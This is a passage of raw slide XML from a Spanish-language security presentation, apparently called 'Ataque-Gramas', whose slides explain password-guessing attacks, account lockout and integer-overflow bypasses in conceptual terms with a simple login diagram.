              <a:rPr lang="es-UY" dirty="0"/>
              <a:t> autorizado!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57445ED4-3902-134B-85FA-37CE02533BA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8261675" y="1175633"/>
            <a:ext cx="3367763" cy="4154984"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="2400" dirty="0"/>
              <a:t>El ataque de intento de adivinar la contraseña es el tipo de ataque más simple.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="2400" dirty="0"/>
              <a:t>La falta de un mecanismo de bloqueo por varios intentos y de requerir una complejidad dada, permiten que este tipo de ataque suceda.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Google Shape;91;p2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F709CBA-7E98-D5C5-F995-0CA8CC5D48F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="186475" y="335525"/>
            <a:ext cx="15594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Y" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Ataque-Gramas</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" sz="16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84781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7B72E-8F91-F125-D58A-011836876D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C27EA9-5DC5-052C-0F69-D0933CA13F25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2193759" y="91886"/>
            <a:ext cx="9435679" cy="895136"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" b="1" dirty="0"/>
              <a:t>Desbordamiento de enteros</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38F83D3B-31FA-6C3E-AB1C-297BA38BB53F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8261675" y="1175633"/>
            <a:ext cx="3367763" cy="3416320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" dirty="0"/>
              <a:t>El código que toma las decisiones de seguridad basado en comparaciones puede ser evadido cuando el contador excede la cota máxima y se reinicia a un número negativo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Google Shape;91;p2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02521AEB-EEC8-34BB-B66D-113E080ACD2E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="186475" y="335525"/>
            <a:ext cx="15594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Y" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Ataque-Gramas</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Google Shape;285;p21" descr="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8615CFC-F2DD-EE1F-BA32-B1A80FC7A83C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect l="80810" t="32962" r="2089" b="37636"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4958234" y="1482862"/>
            <a:ext cx="718458" cy="872839"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Google Shape;286;p21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C6A5D89-F87F-2D9A-A465-1F3EC598CAF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4935061" y="2355700"/>
            <a:ext cx="529195" cy="307736"/>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en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>/login</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Google Shape;287;p21" descr="Graphic 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4B51226-D96B-F6A5-5540-4B9C0711EA97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2210517" y="1443031"/>
            <a:ext cx="952501" cy="952501"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Google Shape;288;p21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9C69B51-E856-BDF7-9484-12E0A39EE5BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2244036" y="2367227"/>
            <a:ext cx="805964" cy="307736"/>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en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Atacante</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="21" name="Google Shape;289;p21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1AFDDFE6-B71A-6CCA-7AB6-46ADD23CB888}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="707720" y="1482862"/>
          <a:ext cx="1302700" cy="1371650"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:noFill/>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1302700">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="260650">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="1200"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" u="none" strike="noStrike" cap="none"/>
                        <a:t>123456</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45725" marR="45725" marT="45725" marB="45725">
                    <a:solidFill>
                      <a:srgbClr val="CACACA"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="260650">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="1200"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" u="none" strike="noStrike" cap="none"/>
                        <a:t>password</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45725" marR="45725" marT="45725" marB="45725">
                    <a:solidFill>
                      <a:srgbClr val="E6E6E6"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="260650">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="1200"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" u="none" strike="noStrike" cap="none"/>
                        <a:t>…</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45725" marR="45725" marT="45725" marB="45725">
                    <a:solidFill>
                      <a:srgbClr val="CACACA"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="260650">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="C00000"/>
                        </a:buClr>
                        <a:buSzPts val="1200"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" u="none" strike="noStrike" cap="none">
                          <a:solidFill>
                            <a:srgbClr val="C00000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>ABCDEFG</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45725" marR="45725" marT="45725" marB="45725">
                    <a:solidFill>
                      <a:srgbClr val="E6E6E6"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10003"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="260650">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="1200"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" u="none" strike="noStrike" cap="none"/>
                        <a:t>…</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45725" marR="45725" marT="45725" marB="45725">
                    <a:solidFill>
                      <a:srgbClr val="CACACA"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10004"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Google Shape;290;p21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{778536CB-3805-61B5-7E26-5389AE45F059}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="807569" y="2925454"/>
            <a:ext cx="1112400" cy="52320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tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Contraseñas</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFil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tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Comunes</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="26" name="Google Shape;291;p21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{751DE39E-9EB0-A69F-D516-CA6B22F927D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2566012" y="2688487"/>
            <a:ext cx="8744" cy="3610959"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="34925" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="accent3"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="27" name="Google Shape;292;p21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{299F1676-A7B8-AA8A-3442-1410FBD9904D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5214195" y="2691207"/>
            <a:ext cx="1" cy="3551873"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="34925" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="accent3"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="36" name="Google Shape;293;p21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA5E5487-5933-00C2-72CC-F15FBFCE260F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2574756" y="3070531"/>
            <a:ext cx="2630696" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="31750" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="C00000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Google Shape;294;p21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{425C8592-B278-8A0C-E162-2B518F158528}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3976755" y="2811206"/>
            <a:ext cx="1141857" cy="307736"/>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en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Credenciales</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="40" name="Google Shape;295;p21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7368C60-647B-5B38-0B6C-4FADA5B5F26D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2566501" y="3085068"/>
            <a:ext cx="2647696" cy="853540"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="accent5"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="38100" dist="20000" dir="5400000" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="37647"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="Google Shape;296;p21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F40B3F5-B018-6386-0601-722184272979}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-1029586">
            <a:off x="2577305" y="3385882"/>
            <a:ext cx="1606846" cy="307736"/>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en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Cuenta bloqueada!</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="42" name="Google Shape;297;p21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49445D8D-D2B3-04B3-8EE3-7065C9569CC8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2567503" y="3963658"/>
            <a:ext cx="2646694" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="31750" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="C00000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="Google Shape;298;p21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CEF26E55-580A-D3A1-331A-ECBC9EEC47F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3976755" y="3667581"/>
            <a:ext cx="1141858" cy="307736"/>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en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Credenciales</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="44" name="Google Shape;299;p21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8034A82D-439B-E352-0B8F-8975F5A441EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2566012" y="3994550"/>
            <a:ext cx="2639440" cy="868136"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="7295D2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="38100" dist="20000" dir="5400000" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="37647"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="Google Shape;300;p21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76ED4A3C-E866-A306-125F-1D1CD66D1C43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-1036934">
            <a:off x="2577102" y="4288387"/>
